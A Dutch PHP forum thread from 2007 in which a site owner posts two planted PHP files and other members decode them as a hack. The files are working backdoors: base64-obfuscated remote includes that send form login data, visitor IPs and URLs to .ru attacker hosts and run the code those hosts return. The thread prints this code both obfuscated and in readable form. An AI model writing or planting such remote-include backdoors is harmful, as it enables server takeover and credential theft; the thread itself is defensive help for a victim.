PHPhulp.nl PHPhulp.nl
35k+ leden Over PHPhulp Offerte opdracht Contact
b

base64

Door blueblot op 20-12-2007 00:03
511 views
hoi,

kan er mij iemand zeggen wat deze code doet of wat ik er moet van verwachten. Ik heb op de server verschillende van deze files gevonden die er voordien niet stonden.
file1.php

<?php error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hegfzzazbzgh".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} ?>


file2.php

<?php error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==")."hegfzzazbzgh".base64_decode("LnVzZXJzLnBocGZyZWUucnU=")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==")."hegfzzazbzgh".base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==")."/?".$str);} ?>



thx
blueblot
F
Frank -
20-12-2007 00:06
Je zou de boel eens leesbaar kunnen noteren, dus over meerdere regels uitgeschreven. Dan wordt al snel duidelijk dat een aantal POST-variabelen (dus gegevens uit een formulier) worden versleuteld en weer worden ontsleuteld.

Maak de boel leesbaar, dat scheelt al snel een factor 100.
W W
20-12-2007 00:08
Jezus, ik denk dat de auteur een "enter-fobie" heeft. Als alles op 1 lijn staat kan ik er niet veel van maken. Sorry!
?
Onbekende gebruiker
20-12-2007 00:15
Je bent gehackt. Het volgende stukje code:
<?php // Kleurtjes
!@include_once(base64_decode("aHR0cDovLw==")."hegfzzazbzgh".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=" ?>

Kan je schrijven als:
<?php // Kleurtjes
if(!@include_once("http://hegfzzazbzgh.users.bishell.ru?r_addr="  
?>

Over bishell.ru is veel te vinden. Waarschijnlijk heb je ergens een brak scriptje.

Pepijn schreef op 20.12.2007 00:08
Jezus, ik denk dat de auteur een "enter-fobie" heeft. Als alles op 1 lijn staat kan ik er niet veel van maken. Sorry!

Nee, ik weet niet precies hoe ze het deden, maar ze planten dat stukkie code in je php bestand. Maar of ze kunnen er geen enter in krijgen, en of ze willer hiermee voor zorgen dat onervaren gebruikers zoals de TS'er niet gelijk opvalt dat dit dus schadelijke code is.
b
blueblot
20-12-2007 18:38
thx Jeej om mijn vermoeden te bevestigen!

maar wat willen ze met deze files bereiken?
Er is bv (door hen) een map 'images' aangemaakt met daarin 3 files: 1 .htaccess file en 2 phpfiles die dan configs.php en links.php noemen met bovenvermelde code in.

thx

blueblot
W
Wouter K
20-12-2007 19:14
verwijder dat en controleer al je scripts !
?
Onbekende gebruiker
20-12-2007 20:27
blueblot schreef op 20.12.2007 18:38
maar wat willen ze met deze files bereiken?
Er is bv (door hen) een map 'images' aangemaakt met daarin 3 files: 1 .htaccess file en 2 phpfiles die dan configs.php en links.php noemen met bovenvermelde code in.


<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])) {
if(isset($_POST["input"])) {
$user_auth = "&l=" . base64_encode($_POST["l"]) . "&p=" . base64_encode(md5($_POST["p"]));
} else {
$user_auth = "&l=" . $_POST["l"] . "&p=" . $_POST["p"];
}
} else {
$user_auth="";
}
if(!isset($_POST["log_flg"])) {
$log_flg = "&log";
}
if(!@include_once("http://hegfzzazbzgh.users.bishell.ru/?r_addr=" . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) . "&url=" . base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
if($_POST["l"]=="special") {
print "sys_active" . `uname -a`;
}
}
?>

Het bovenstaande scriptje haalt gegevens op (als bepaalde variabele zijn geset), en verstuurt ze naar dat adres wat er in de include staat, welke hij tevens include. Ik zei dat er veel over bishell.ru te vinden was op het internet, wat dus niet het geval is. Bishell.ru is geregistreert door ns0.ru, een niet zo fijn bedrijf, kijk maar naar deze pagina (Google Translate). Ik heb dacht ik ook op phpfreakz.nl iemand hiermee geholpen, alleen ik kan niet me berichten terug vinden via Google.
<?php
error_reporting(0);
$s = "e";
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str = base64_encode($a) . "." . base64_encode($b) .  "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".$s";
if(include("http://hegfzzazbzgh.users.phpfree.ru/?" .$str )){
} else {
include("http://hegfzzazbzgh.users.phpcoding.ru/?".$str);
}
?>

De ternery if statement heb ik niet weggehaalt. Deze werkt precies hetelfde als die hierboven, alleen op een andere manier. Het is relatief nieuw, zo te zien, met deze domeinen dan. Dat is ook het tweede wat ik met google vind als ik op phpfree.ru zoek.
Ik heb nu gelukkig weer het topic waar ik op phpfreakz.nl naar verwees gevonden.

Reageren

Inloggen om te reageren